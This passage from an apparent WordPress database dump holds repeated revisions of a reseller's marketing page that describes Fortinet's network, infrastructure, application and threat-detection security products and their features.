botnets, zero days and targeted attacks on the network.\r\n<ul>\r\n 	<li><strong>High performance</strong></li>\r\n</ul>\r\nInnovative security processor (SPU) technology for high-performance network throughput and deep security inspection.\r\n<ul>\r\n 	<li><strong>Advanced threat protection</strong></li>\r\n</ul>\r\nSeamless integration â€“ appliance or cloud service â€“ with world-class sandboxing for advanced threats.\r\n<ul>\r\n 	<li><strong>Security Fabric integration</strong></li>\r\n</ul>\r\nIntegration and automation with Fortinetâ€™s broad product portfolio and partner ecosystem.\r\n<ul>\r\n 	<li><strong>Data leak protection</strong></li>\r\n</ul>\r\nFile protection controls to prevent sensitive data exfiltration.\r\n\r\n4.Â <strong>Crypto VPNs</strong>\r\n\r\nMaintaining uniform security policy for all corporate users, applications, devices irrespective of their location and appropriate access control is essential to providing security in a multi-cloud environment. The data in motion must be protected using mutual authentication and confidentiality to protect sensitive corporate data over unprotected networks and provides a defensible proof of security.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Hardware assisted encryption</strong></li>\r\n</ul>\r\nPrevent breaches and secure data in transit at a very high speed.\r\n<ul>\r\n 	<li><strong>Scalable Security</strong></li>\r\n</ul>\r\nScalable security that is seamlessly integrated with routing.\r\n<ul>\r\n 	<li><strong>Comprehensive data communications security</strong></li>\r\n</ul>\r\nProtects Application to Application, User to Users, User to Machine, Machine to Machine communication.\r\n<ul>\r\n 	<li><strong>Diverse VPNs</strong></li>\r\n</ul>\r\nIPsec or SSL based diverse VPNs to offer flexible secure network choices.\r\n<ul>\r\n 	<li><strong>Security Fabric Integration</strong></li>\r\n</ul>\r\nShare FortiTelemetry information across site-to-site tunnels with required confidentiality.\r\n<ul>\r\n 	<li><strong>Unified Management</strong></li>\r\n</ul>\r\nSimplified, easy-to-manage, single pane of glass to manage large scale crypto VPNs, Routing and NGFW.\r\n\r\n5.Â <strong>Secure Web Gateway (SWG)</strong>\r\n\r\nFortinet firewalls with Gateway Security protects enterprises against web attacks with URL filtering, visibility and control of encrypted web traffic via SSL inspection, and application of granular web application policies. Fortinet is the first and only gateway security vendor to earn Virus Bulletinâ€™s VBWeb certification for web filtering effectiveness.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li>Feature-rich product that consolidates NGFW and SWG services.</li>\r\n 	<li>Powerful hardware that can perform SSL deep inspection.</li>\r\n 	<li>Anti-malware techniques updated with the latest threat intelligence.</li>\r\n 	<li>Reduce security teamâ€™s workload by providing a single pane of glass management for both NGFW and SWG.</li>\r\n 	<li>Effectively remove blind spots in encrypted traffic, without compromising on performance.</li>\r\n 	<li>Stay protected against the latest known and unknown internet-borne attacks.</li>\r\n</ul>\r\n6.Â <strong>Management &amp; Reporting</strong>\r\n\r\nSecurity teams globally are challenged by resource constraints, both in terms of the number of staff and raw security talent. Moreover, security teams are asked to do more, often in more complex networks and with growing numbers of alerts from multiple systems. Successful security teams allay these challenges by implementing three best practices. First, they simplify the way view management, combining operation NOC-style views with security-based SOC context. Second, they regularly measure and score their security effectiveness, enabling them anytime to answer how secure they are. Third, they demand deep integration so they can automate repetitive actions, especially across silos when possible.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Security Operationalized Visibility</strong></li>\r\n</ul>\r\nBig picture perspective allows you to see the forest through the tree.\r\n<ul>\r\n 	<li><strong>Cross Silo Automation</strong></li>\r\n</ul>\r\nDeeper than mere integration, orchestrate workflow responses to triggered security events.\r\n<ul>\r\n 	<li><strong>Simplified Management</strong></li>\r\n</ul>\r\nStreamline deployment and management, reducing task time and improving response time.\r\n<ul>\r\n 	<li><strong>Rapid Detection</strong></li>\r\n</ul>\r\nConsolidate telemetry and alerts to uncover patterns and discover security insights.\r\n<ul>\r\n 	<li><strong>Fortinet Fabric</strong></li>\r\n</ul>\r\nCentralized control over all of your Fortinet network assets.\r\n<h3>INFRASTRUCTURE PROTECTION</h3>\r\n<ol>\r\n 	<li><strong>Endpoint Protection</strong></li>\r\n</ol>\r\nEndpoints are frequently the target of initial compromise or attacks. FortiClient strengthens endpoint security through integrated visibility, control, and proactive defense. With the ability to discover, monitor, and assess endpoint risks, you can ensure endpoint compliance, mitigate risks, and reduce exposure. FortiClient proactively defends against advanced attacks. Its tight integration with the Security Fabric enables policy-based automation to contain threats and control outbreaks. FortiClient is compatible with Fabric-Ready partners to further strengthen enterprisesâ€™ security posture.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Broad endpoint visibility</strong></li>\r\n</ul>\r\nFortiClient Fabric Agent integrates endpoints into the Security Fabric and provides endpoint telemetry, including user identity, protection status, risk scores, unpatched vulnerabilities, security events, and more.\r\n<ul>\r\n 	<li><strong>Proactive endpoint defense</strong></li>\r\n</ul>\r\nAnti-exploit, sandbox integration, and behavior and pattern-based malware detection proactively detect and block malware, malicious scripts, document-based, and other advanced attacks.\r\n<ul>\r\n 	<li><strong>Automated threat containment</strong></li>\r\n</ul>\r\nIntegration with the Security Fabric enables automated response. Mitigate unpatched vulnerabilities, alert users, and quarantine risky or compromised endpoints to stem an outbreak.\r\n<ul>\r\n 	<li><strong>Secure remote access</strong></li>\r\n</ul>\r\nReliable, simple, and secure remote access with built-in, always-on VPN, with the added security of two-factor authentication, plus single-sign-on capabilities.\r\n<ul>\r\n 	<li><strong>Easy to deploy and manage</strong></li>\r\n</ul>\r\nEasy to deploy and manage Modular and light-weight endpoint agents are centrally managed with the Enterprise Manager Server (EMS). Fabric Agent is compatible with Fabric-Ready endpoint security solutions.\r\n\r\n2.Â <strong>Wireless</strong>\r\n\r\nFortinet provides a full suite of Wi-Fi Access Point and WLAN Controller products as part of our Secure Access solution designed to address the unique requirements of every organization. For assistance choosing an AP, our AP Product selector can be found here. Configuration and control of your wireless environment can be done directly with a FortiGate or via our dedicated Wireless LAN controllers. Fortinet also offers FortiManager and FortiCloud as management solutions for the entire Fortinet security fabric. All Fortinetâ€™s wireless solutions integrate with our location analytics platform: FortiPresence. This enables real-time locationing and device tracking.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Security Fabric Integration</strong></li>\r\n</ul>\r\nIntegration with FortiGate firewalls extends your security fabric out to the edge of the network.\r\n<ul>\r\n 	<li><strong>Superior density, scalability and mobilit</strong><strong>y</strong></li>\r\n</ul>\r\nHandle even the most complex RF environments.\r\n<ul>\r\n 	<li><strong>Zero-touch deployment</strong></li>\r\n</ul>\r\nFast and simple deployment with no requirements for onsite tech support.\r\n<ul>\r\n 	<li><strong>Simplified deployment and capacity expansion</strong></li>\r\n</ul>\r\nNo licenses to manage, just plug and go.\r\n<ul>\r\n 	<li><strong>Free location and analytics</strong></li>\r\n</ul>\r\nWireless device locationing tools included with no additional licenses required.\r\n<ul>\r\n 	<li><strong>Scalability from 1 to 10,000 APs</strong></li>\r\n</ul>\r\nA range of platforms for any sized deployment.\r\n\r\n3.Â <strong>Switching</strong>\r\n\r\nLegacy Ethernet LANs face many challenges including exponential growth in devices and applications, increased throughput demands from wireless LANs, and complex security implementations. Rather than asking how to secure traditional Ethernet LANs, Fortinet takes a security centric approach offering Ethernet as an extension of the security infrastructure through FortiSwitch and FortiLink. FortiSwitch offers a broad portfolio of secure, simple, and scalable Ethernet switches for applications that range from desktop to data center.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Security Fabric Integration with FortiLink</strong></li>\r\n</ul>\r\nFortiGate management of FortiSwitch extends Security Fabric features to the Ethernet access layer.\r\n<ul>\r\n 	<li><strong>No Touch Provisioning and Management with FortiLink</strong></li>\r\n</ul>\r\nAuto discovery, Global VLAN and Security Policies, Firewall interfaces and Ethernet ports equally secure.\r\n<ul>\r\n 	<li><strong>Highly Scalable</strong></li>\r\n</ul>\r\nBroad portfolio of stackable 1, 10, and 40 GE access ports with up to 100 GE uplinks to scale from desktop to datacenter.\r\n<ul>\r\n 	<li><strong>Unparalleled Visibility</strong></li>\r\n</ul>\r\nSingle pane of glass management of both Security and Network Access, Device detection and port visibility.\r\n<ul>\r\n 	<li><strong>Enable voice, data, and wireless traffic across a single network</strong></li>\r\n</ul>\r\nPower network and IoT devices with POE, Auto provision using LLDP-MED.\r\n<ul>\r\n 	<li><strong>Virtual Stacking</strong></li>\r\n</ul>\r\nFortiLink enables stacking across IDFs when managed, up to 300 switches based on FortiGate model.\r\n\r\n4.Â <strong>Email Security</strong>\r\n\r\nEmail security remains a key productivity tool for today\'s organizations, as well as a successful attack vector for cyber criminals. FortiMail Email security utilizes the latest technologies and security services from FortiGuard Labs to deliver consistently top-rated protection from common and advanced threats while integrating robust data protection capabilities to avoid data loss.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Top-rated Antispam and Antiphishing</strong></li>\r\n</ul>\r\nMaintain productivity by shielding end users from unwanted spam and malicious phishing attacks.\r\n<ul>\r\n 	<li><strong>Independently certified advanced threat defense</strong></li>\r\n</ul>\r\nThwart cyber criminals intent on stealing data, holding systems for ransomware, conducting fraud, and other malicious purposes.\r\n<ul>\r\n 	<li><strong>Integrated data protection</strong></li>\r\n</ul>\r\nMaintain the privacy of personal information and confidentiality of sensitive data in compliance with regulatory and corporate guidelines.\r\n<ul>\r\n 	<li><strong>High-performance mail handling</strong></li>\r\n</ul>\r\nSpeed the delivery of legitimate email at an affordable cost.\r\n<ul>\r\n 	<li><strong>Enterprise-class management</strong></li>\r\n</ul>\r\nFree staff and end users to drive the business by reducing time spent on email administration.\r\n<h3>APPLICATION SECURITY</h3>\r\n<ol>\r\n 	<li><strong>Web Application Firewall (WAF)</strong></li>\r\n</ol>\r\nUnprotected web applications are the easiest point of entry for hackers and vulnerable to a number of attack types. FortiWebâ€™s AI-enhanced and multi-layered approach protects your web apps from the OWASP Top 10 and more. When combined with our Web Application Security Service from FortiGuard Labs youâ€™re protected from the latest application vulnerabilities, bots, and suspicious URLs, and with dual machine learning detection engines your applications are safe from sophisticated threats such as SQL injection, cross-site scripting, buffer overflows, cookie poisoning, malicious sources, and DoS attacks.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Proven Web Application Protection</strong></li>\r\n</ul>\r\nFortiWeb protects against all the OWASP Top-10 threats, DDoS attacks and many others to defend your mission critical web-based applications.\r\n<ul>\r\n 	<li><strong>AI-based Threat Detection</strong></li>\r\n</ul>\r\nIn addition to regular signature updates and many other layers of defenses, FortiWebâ€™s AI-based, dual-layer machine learning engines protect against zero-day attacks.\r\n<ul>\r\n 	<li><strong>Security Fabric Integration</strong></li>\r\n</ul>\r\nIntegration with FortiGate firewalls and FortiSandbox deliver protection from advanced persistent threats.\r\n<ul>\r\n 	<li><strong>Hardware-based Acceleration</strong></li>\r\n</ul>\r\nFortiWeb delivers industry-leading protected WAF throughputs and blazing fast secure traffic encryption/decryption.\r\n<ul>\r\n 	<li><strong>False Positive Mitigation Tools</strong></li>\r\n</ul>\r\nAdvanced tools that minimize the day-to-day management of policies and exception lists to ensure only unwanted traffic is blocked.\r\n<ul>\r\n 	<li><strong>Advanced Visual Analytics</strong></li>\r\n</ul>\r\nFortiWebâ€™s visual reporting tools provide detailed analyses of attack sources, types and other elements that provide insights not available with other WAF solutions.\r\n\r\n2.Â <strong>Application Delivery Controller</strong>\r\n\r\nWith bandwidth demand growing faster than budgets and cyber-attacks constantly on the rise, it can be challenging to securely and efficiently deliver applications at the speed your users expect. Fortinet Application Delivery Controller (ADC) appliances optimize the availability, user experience, and scalability of enterprise application delivery. They enable fast, secure, and intelligent acceleration and distribution of even the most demanding enterprise applications.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Secure Traffic Management</strong></li>\r\n</ul>\r\nSSL offloading, forward proxy and visibility increase responsiveness and assist in scanning for threats.\r\n<ul>\r\n 	<li><strong>Application Optimization</strong></li>\r\n</ul>\r\nSpeed web application delivery with compression, caching, HTTP 2.0, and HTTP Page Speed-UP.\r\n<ul>\r\n 	<li><strong>Security Fabric Integration</strong></li>\r\n</ul>\r\nAV and Sandbox integration scans attachments to protect from the latest threats.\r\n<ul>\r\n 	<li><strong>Global Server Load Balancing</strong></li>\r\n</ul>\r\nDistributes traffic across multiple geographical locations for disaster recovery.\r\n<ul>\r\n 	<li><strong>Security Features</strong></li>\r\n</ul>\r\nWeb Application Firewall, Web Filtering, and IP Reputation for enhanced security.\r\n\r\n3.Â <strong>DDoS</strong>\r\n\r\nDistributed Denial of Service (DDoS) attacks are ever-evolving and use a variety of technologies. To successfully combat these attacks, you need a dynamic, multi-layered security solution. FortiDDoS protects from both known and zero day attacks with very low latency. Itâ€™s easy to deploy and manage, and includes comprehensive reporting and analysis tools.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li>100% security processor (SPU)-based layer 3, 4, and 7 DDoS protection application-aware traffic management.</li>\r\n 	<li>Ability to monitor hundreds of thousands of parameters simultaneously.</li>\r\n 	<li>Behavior-based DDoS protection to eliminate need for signature files.</li>\r\n 	<li>Minimal false-positive detections through continuous threat evaluation.</li>\r\n 	<li>Attack protection for DNS services via specialized tools.</li>\r\n 	<li>Defense against every DDoS attack: bulk volumetric, layer 7 application, and SSL/HTTPS.</li>\r\n</ul>\r\n<h3>THREAT DETECTION &amp; PREVENTION</h3>\r\n<ol>\r\n 	<li><strong>Sandbox</strong></li>\r\n</ol>\r\nWith the increasing volume and sophistication of cyber-attacks, it takes only one threat to slip through security for a data breach to occur. CISOs have adopted sandboxing as an essential component of their security strategies to help combat previously unknown threats. While attack surfaces are becoming more dynamic due to the rise of IoT and cloud-based services, a continuing shortage of cyber security talent is driving organizations to integrate sandboxing with greater controls and a high degree of automation.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Broad integration</strong></li>\r\n</ul>\r\nExtends advanced threat protection to your next-generation firewall, web application firewall, secure email gateway, and endpoint protection platform.\r\n<ul>\r\n 	<li><strong>Intelligent automation</strong></li>\r\n</ul>\r\nSpeeds mitigation by sharing real-time updates to disrupt threats at the origin and subsequent immunization across the entire organization and the global community.\r\n<ul>\r\n 	<li><strong>All-in-one</strong></li>\r\n</ul>\r\nSimplifies deployment and reduces complexity by covering all protocols in a single common sandbox platform.\r\n<ul>\r\n 	<li><strong>Flexible deployment</strong></li>\r\n</ul>\r\nAvailable as a physical or virtual appliance on premises, as well as a cloud-based or managed service.\r\n<ul>\r\n 	<li><strong>Open extensibility</strong></li>\r\n</ul>\r\nFlexible APIs for easy third-party integration and available day-zero integration with Fabric-Ready partners.\r\n\r\n2.Â <strong>FortiSIEM</strong>\r\n\r\nSecurity management only gets more complex. Endpoints, IoT, Infrastructure, Security Tools, Applications, VMâ€™s and Cloud â€“ the number of things you need to secure and monitor grows constantly. FortiSIEM â€“ Fortinetâ€™s Multivendor Security Incident and Events Management solution brings it all together. Visibility, Correlation, Automated Response and Remediation in a single, scalable solution. Using a Business Services view, the complexity of managing network and security operations is reduced, freeing resources, improving breach detection. Worldwide 80% of breaches go undetected because of skills shortage and event information â€˜noiseâ€™. FortiSIEM provides the cross correlation, applies machine learning and UEBA to improve response, to stop breaches before they occur.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Asset Self-Discovery</strong></li>\r\n</ul>\r\nVisibility needs to be both comprehensive and granular â€“ understanding a devices contextual capabilities and vulnerabilities reduces false positives.\r\n<ul>\r\n 	<li><strong>Rapid Integrations and Scalability</strong></li>\r\n</ul>\r\nNetwork aware and security tool agnostic operations and management get a real-time business view of availability, utilization and security posture.\r\n<ul>\r\n 	<li><strong>Automated Workflow</strong></li>\r\n</ul>\r\nA leading SOAR (Security Orchestration and Automated Response engine) the FortiSIEM Remediation Library responds to threats with the security tools you have today, and will grow with your enterprise.\r\n<ul>\r\n 	<li><strong>Unified Platform</strong></li>\r\n</ul>\r\nMulti-tenancy for role-based access to a unified platform. Of benefit to MSPâ€™s and Enterprise customers alike â€“ deliver services and reports to a customer or a report. Share actionable intelligence and deliver value without compromise.\r\n\r\n3.Â <strong>User and Entity Behavior Analytics (UEBA)</strong>\r\n\r\nFortinet User and Entity Behavior Analytics (UEBA) technology protects organizations from insider threats by continuously monitoring users and endpoints with automated detection and response capabilities. Leveraging machine learning and advanced analytics, Fortinet UEBA automatically identifies non-compliant, suspicious, or anomalous behavior and rapidly alerts any compromised user accounts. This proactive approach to threat detection delivers an additional layer of protection and visibility, whether users are on or off the corporate network.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Augmented Intelligence (AI)</strong></li>\r\n</ul>\r\nEnhanced data visibility with machine learning and UEBA to identify threats.\r\n<ul>\r\n 	<li><strong>Rapid Threat Detection</strong></li>\r\n</ul>\r\nAI optimizes each stage of the threat investigation pipeline, shining a light on the unknown.\r\n<ul>\r\n 	<li><strong>Regulatory Compliance Support</strong></li>\r\n</ul>\r\nSupport regulatory compliance with a dedicated reporting tool, to respond to and manage potential non-compliant activity.\r\n<ul>\r\n 	<li><strong>Data Security</strong></li>\r\n</ul>\r\nMonitor data movement and endpoint activity 24/7 regardless of location or device, whether users are on or off your network.\r\n<ul>\r\n 	<li><strong>Forensic-level Reporting</strong></li>\r\n</ul>\r\nCompile a full forensic history of user behavior, enabling thorough forensics investigation and detailed reporting.\r\n<ul>\r\n 	<li><strong>Valuable Insights</strong></li>\r\n</ul>\r\nAnalyze data and deliver valuable insights, allowing your team to contain insider threats and respond in real time.\r\n\r\n[maxbutton id=\"1\" ]','Fortinet','','inherit','closed','closed','','1474-revision-v1','','','2019-09-30 11:30:26','2019-09-30 03:30:26','',1474,'https://bintara.com.my/blog/2019/09/30/1474-revision-v1/',0,'revision','',0),(3551,1,'2019-09-30 11:30:51','2019-09-30 03:30:51','<strong style=\"font-size: 2em;\">Fortinet</strong> provide top-rated network and content security, as well as secure access products that share intelligence and work together to form a cooperative fabric. Our uniqueÂ security fabricÂ combines Security Processors, an intuitive operating system, and applied threat intelligence to give you proven security, exceptional performance, and better visibility and control--while providing easier administration.\r\n\r\nFortiGate is available in a wide range of sizes and form factors to fit any environment and provides a broad array of next-generation security and networking functions. Complementary products can be deployed with a FortiGate to enable a simplified, end-to-end security infrastructure covering:\r\n<ul>\r\n 	<li>Network security</li>\r\n 	<li>Multi-Cloud security</li>\r\n 	<li>Web Application Security</li>\r\n 	<li>Email security</li>\r\n 	<li>Advanced Threat Protection</li>\r\n 	<li>Secure Unified Access</li>\r\n 	<li>Endpoint security</li>\r\n 	<li>Management and Analytics</li>\r\n</ul>\r\n<h3>NETWORK SECURITY</h3>\r\n<ol>\r\n 	<li><strong>Next Generation Firewall (NGFW)</strong></li>\r\n</ol>\r\nFortiGate enterprise firewalls offer flexible deployments from the network edge to the core, data center, internal segment, and the Cloud. FortiGate enterprise firewalls leverages purpose-built security processors (SPUs) that delivers scalable performance of advanced security services like Threat Protection, SSL inspection, and ultra-low latency for protecting internal segments and mission critical environments.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>High-performance threat protection</strong></li>\r\n</ul>\r\nIndustry\'s highest threat protection and SSL inspection performance to protect from malware attacks hiding in encrypted traffic.\r\n<ul>\r\n 	<li><strong>Validated security effectiveness</strong></li>\r\n</ul>\r\nIndependently certified and continuous threat intelligence updates provide robust protection from known and unknown attacks.\r\n<ul>\r\n 	<li><strong>Protect mission critical applications</strong></li>\r\n</ul>\r\nHighly scalable segmentation and ultra-low latency to protect network segments.\r\n<ul>\r\n 	<li><strong>Continuous risk assessment via automation</strong></li>\r\n</ul>\r\nLeverage automated workflow and auditing features to deal with scarce security staff and continuously maintain compliance posture.\r\n<ul>\r\n 	<li><strong>Security Fabric integration</strong></li>\r\n</ul>\r\nIntelligently share threats across the entire digital attack surface to provide quick and automated protection.\r\n<ul>\r\n 	<li><strong>Enterprise class security management</strong></li>\r\n</ul>\r\nDeliver consistent security policy -- Single pane-of-glass to manage security assets irrespective of location and form factor.\r\n\r\n2.Â <strong>Secure SD-WAN</strong>\r\n\r\nFortinet is the only NGFW vendor to provide native SD-WAN along with integrated advanced threat protection. Fortinet, has received the â€œRecommendedâ€ rating for the first ever test conducted by NSS Labs for Software-Defined Wide Area Networking. Fortinet delivered excellent quality of experience for voice and video, high VPN throughput and best price/performance. FortiGate SD-WAN replaces separate WAN routers, WAN optimization, and security devices with a single solution that is application-aware, offers automatic WAN path control and multi-broadband support. It improves application performance, reduces WAN Operating expenses and minimizes management complexity.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li>Application aware solution, support a broad range of 3000+ applications as well as granular visibility into sub-applications.</li>\r\n 	<li>Path awareness intelligence to monitor application-level transactions, and dynamically failover to the best available path.</li>\r\n 	<li>Single-pane-of-glass management simplifies deployment, management and monitoring of SD-WAN devices.</li>\r\n 	<li>Reduced complexity and high total cost of ownership by using best of breed SD-WAN and NGFW functionality on a single appliance.</li>\r\n 	<li>Improve cloud application performance by prioritizing business critical applications and enabling branches to directly communicate to the internet.</li>\r\n 	<li>Reduce operating expenses by migrating from MPLS and utilizing multi-broadband such as Ethernet, DSL, and LTE.</li>\r\n</ul>\r\n3.Â <strong>IPS</strong>\r\n\r\nWhether part of a firewall solution or a separate standalone appliance, Intrusion Prevention Systems (IPS) technology is becoming an increasingly ubiquitous part of network security defenses. Fortinet, well known for its next-generation firewall (NGFW) solution, has built IPS technology for more than ten years. Fortinet customers expect and depend on high performance from FortiGate firewalls and FortiGate IPS benefits from this legacy, delivering pound-for-pound, the best IPS performance available in the market today. FortiGate IPS, following a different evolution path than traditional IPS, innovates in ways that other standalone IPS products do not.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>World-class Protection</strong></li>\r\n</ul>\r\nDeep inspection for advanced threats, botnets, zero days and targeted attacks on the network.\r\n<ul>\r\n 	<li><strong>High performance</strong></li>\r\n</ul>\r\nInnovative security processor (SPU) technology for high-performance network throughput and deep security inspection.\r\n<ul>\r\n 	<li><strong>Advanced threat protection</strong></li>\r\n</ul>\r\nSeamless integration â€“ appliance or cloud service â€“ with world-class sandboxing for advanced threats.\r\n<ul>\r\n 	<li><strong>Security Fabric integration</strong></li>\r\n</ul>\r\nIntegration and automation with Fortinetâ€™s broad product portfolio and partner ecosystem.\r\n<ul>\r\n 	<li><strong>Data leak protection</strong></li>\r\n</ul>\r\nFile protection controls to prevent sensitive data exfiltration.\r\n\r\n4.Â <strong>Crypto VPNs</strong>\r\n\r\nMaintaining uniform security policy for all corporate users, applications, devices irrespective of their location and appropriate access control is essential to providing security in a multi-cloud environment. The data in motion must be protected using mutual authentication and confidentiality to protect sensitive corporate data over unprotected networks and provides a defensible proof of security.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Hardware assisted encryption</strong></li>\r\n</ul>\r\nPrevent breaches and secure data in transit at a very high speed.\r\n<ul>\r\n 	<li><strong>Scalable Security</strong></li>\r\n</ul>\r\nScalable security that is seamlessly integrated with routing.\r\n<ul>\r\n 	<li><strong>Comprehensive data communications security</strong></li>\r\n</ul>\r\nProtects Application to Application, User to Users, User to Machine, Machine to Machine communication.\r\n<ul>\r\n 	<li><strong>Diverse VPNs</strong></li>\r\n</ul>\r\nIPsec or SSL based diverse VPNs to offer flexible secure network choices.\r\n<ul>\r\n 	<li><strong>Security Fabric Integration</strong></li>\r\n</ul>\r\nShare FortiTelemetry information across site-to-site tunnels with required confidentiality.\r\n<ul>\r\n 	<li><strong>Unified Management</strong></li>\r\n</ul>\r\nSimplified, easy-to-manage, single pane of glass to manage large scale crypto VPNs, Routing and NGFW.\r\n\r\n5.Â <strong>Secure Web Gateway (SWG)</strong>\r\n\r\nFortinet firewalls with Gateway Security protects enterprises against web attacks with URL filtering, visibility and control of encrypted web traffic via SSL inspection, and application of granular web application policies. Fortinet is the first and only gateway security vendor to earn Virus Bulletinâ€™s VBWeb certification for web filtering effectiveness.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li>Feature-rich product that consolidates NGFW and SWG services.</li>\r\n 	<li>Powerful hardware that can perform SSL deep inspection.</li>\r\n 	<li>Anti-malware techniques updated with the latest threat intelligence.</li>\r\n 	<li>Reduce security teamâ€™s workload by providing a single pane of glass management for both NGFW and SWG.</li>\r\n 	<li>Effectively remove blind spots in encrypted traffic, without compromising on performance.</li>\r\n 	<li>Stay protected against the latest known and unknown internet-borne attacks.</li>\r\n</ul>\r\n6.Â <strong>Management &amp; Reporting</strong>\r\n\r\nSecurity teams globally are challenged by resource constraints, both in terms of the number of staff and raw security talent. Moreover, security teams are asked to do more, often in more complex networks and with growing numbers of alerts from multiple systems. Successful security teams allay these challenges by implementing three best practices. First, they simplify the way view management, combining operation NOC-style views with security-based SOC context. Second, they regularly measure and score their security effectiveness, enabling them anytime to answer how secure they are. Third, they demand deep integration so they can automate repetitive actions, especially across silos when possible.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Security Operationalized Visibility</strong></li>\r\n</ul>\r\nBig picture perspective allows you to see the forest through the tree.\r\n<ul>\r\n 	<li><strong>Cross Silo Automation</strong></li>\r\n</ul>\r\nDeeper than mere integration, orchestrate workflow responses to triggered security events.\r\n<ul>\r\n 	<li><strong>Simplified Management</strong></li>\r\n</ul>\r\nStreamline deployment and management, reducing task time and improving response time.\r\n<ul>\r\n 	<li><strong>Rapid Detection</strong></li>\r\n</ul>\r\nConsolidate telemetry and alerts to uncover patterns and discover security insights.\r\n<ul>\r\n 	<li><strong>Fortinet Fabric</strong></li>\r\n</ul>\r\nCentralized control over all of your Fortinet network assets.\r\n<h3>INFRASTRUCTURE PROTECTION</h3>\r\n<ol>\r\n 	<li><strong>Endpoint Protection</strong></li>\r\n</ol>\r\nEndpoints are frequently the target of initial compromise or attacks. FortiClient strengthens endpoint security through integrated visibility, control, and proactive defense. With the ability to discover, monitor, and assess endpoint risks, you can ensure endpoint compliance, mitigate risks, and reduce exposure. FortiClient proactively defends against advanced attacks. Its tight integration with the Security Fabric enables policy-based automation to contain threats and control outbreaks. FortiClient is compatible with Fabric-Ready partners to further strengthen enterprisesâ€™ security posture.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Broad endpoint visibility</strong></li>\r\n</ul>\r\nFortiClient Fabric Agent integrates endpoints into the Security Fabric and provides endpoint telemetry, including user identity, protection status, risk scores, unpatched vulnerabilities, security events, and more.\r\n<ul>\r\n 	<li><strong>Proactive endpoint defense</strong></li>\r\n</ul>\r\nAnti-exploit, sandbox integration, and behavior and pattern-based malware detection proactively detect and block malware, malicious scripts, document-based, and other advanced attacks.\r\n<ul>\r\n 	<li><strong>Automated threat containment</strong></li>\r\n</ul>\r\nIntegration with the Security Fabric enables automated response. Mitigate unpatched vulnerabilities, alert users, and quarantine risky or compromised endpoints to stem an outbreak.\r\n<ul>\r\n 	<li><strong>Secure remote access</strong></li>\r\n</ul>\r\nReliable, simple, and secure remote access with built-in, always-on VPN, with the added security of two-factor authentication, plus single-sign-on capabilities.\r\n<ul>\r\n 	<li><strong>Easy to deploy and manage</strong></li>\r\n</ul>\r\nEasy to deploy and manage Modular and light-weight endpoint agents are centrally managed with the Enterprise Manager Server (EMS). Fabric Agent is compatible with Fabric-Ready endpoint security solutions.\r\n\r\n2.Â <strong>Wireless</strong>\r\n\r\nFortinet provides a full suite of Wi-Fi Access Point and WLAN Controller products as part of our Secure Access solution designed to address the unique requirements of every organization. For assistance choosing an AP, our AP Product selector can be found here. Configuration and control of your wireless environment can be done directly with a FortiGate or via our dedicated Wireless LAN controllers. Fortinet also offers FortiManager and FortiCloud as management solutions for the entire Fortinet security fabric. All Fortinetâ€™s wireless solutions integrate with our location analytics platform: FortiPresence. This enables real-time locationing and device tracking.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Security Fabric Integration</strong></li>\r\n</ul>\r\nIntegration with FortiGate firewalls extends your security fabric out to the edge of the network.\r\n<ul>\r\n 	<li><strong>Superior density, scalability and mobilit</strong><strong>y</strong></li>\r\n</ul>\r\nHandle even the most complex RF environments.\r\n<ul>\r\n 	<li><strong>Zero-touch deployment</strong></li>\r\n</ul>\r\nFast and simple deployment with no requirements for onsite tech support.\r\n<ul>\r\n 	<li><strong>Simplified deployment and capacity expansion</strong></li>\r\n</ul>\r\nNo licenses to manage, just plug and go.\r\n<ul>\r\n 	<li><strong>Free location and analytics</strong></li>\r\n</ul>\r\nWireless device locationing tools included with no additional licenses required.\r\n<ul>\r\n 	<li><strong>Scalability from 1 to 10,000 APs</strong></li>\r\n</ul>\r\nA range of platforms for any sized deployment.\r\n\r\n3.Â <strong>Switching</strong>\r\n\r\nLegacy Ethernet LANs face many challenges including exponential growth in devices and applications, increased throughput demands from wireless LANs, and complex security implementations. Rather than asking how to secure traditional Ethernet LANs, Fortinet takes a security centric approach offering Ethernet as an extension of the security infrastructure through FortiSwitch and FortiLink. FortiSwitch offers a broad portfolio of secure, simple, and scalable Ethernet switches for applications that range from desktop to data center.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Security Fabric Integration with FortiLink</strong></li>\r\n</ul>\r\nFortiGate management of FortiSwitch extends Security Fabric features to the Ethernet access layer.\r\n<ul>\r\n 	<li><strong>No Touch Provisioning and Management with FortiLink</strong></li>\r\n</ul>\r\nAuto discovery, Global VLAN and Security Policies, Firewall interfaces and Ethernet ports equally secure.\r\n<ul>\r\n 	<li><strong>Highly Scalable</strong></li>\r\n</ul>\r\nBroad portfolio of stackable 1, 10, and 40 GE access ports with up to 100 GE 